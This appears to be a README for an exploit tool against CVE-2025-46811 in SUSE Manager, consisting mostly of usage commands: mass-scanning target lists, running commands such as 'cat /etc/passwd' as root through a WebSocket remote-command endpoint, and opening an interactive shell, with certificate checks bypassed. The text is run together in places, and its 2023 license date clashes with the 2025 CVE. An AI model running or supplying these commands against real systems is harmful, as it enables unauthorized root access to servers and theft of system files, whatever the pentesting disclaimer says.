
CVE-2025-46811
git clone https://github.com/yourusername/suse-manager-exploit.git
cd suse-manager-exploit
pip install -r requirements.txtpython3 exploit.py scan -i targets.txt -o vulnerable.txt --debug# Single command python3 exploit.py exploit 10.0.0.5 -c "cat /etc/passwd"Interactive shell
python3 exploit.py exploit vulnerable.com --debug
This tool is for authorized penetration testing and educational purposes only. Usage against systems without prior permission is illegal.
MIT - Copyright (c) 2023
| Component | Description |
|---|---|
| WebSocket Endpoint | /rhn/websocket/minion/remote-commands |
| Vulnerability Check | Verifies root command execution via id |
| SSL Handling | Bypasses certificate verification |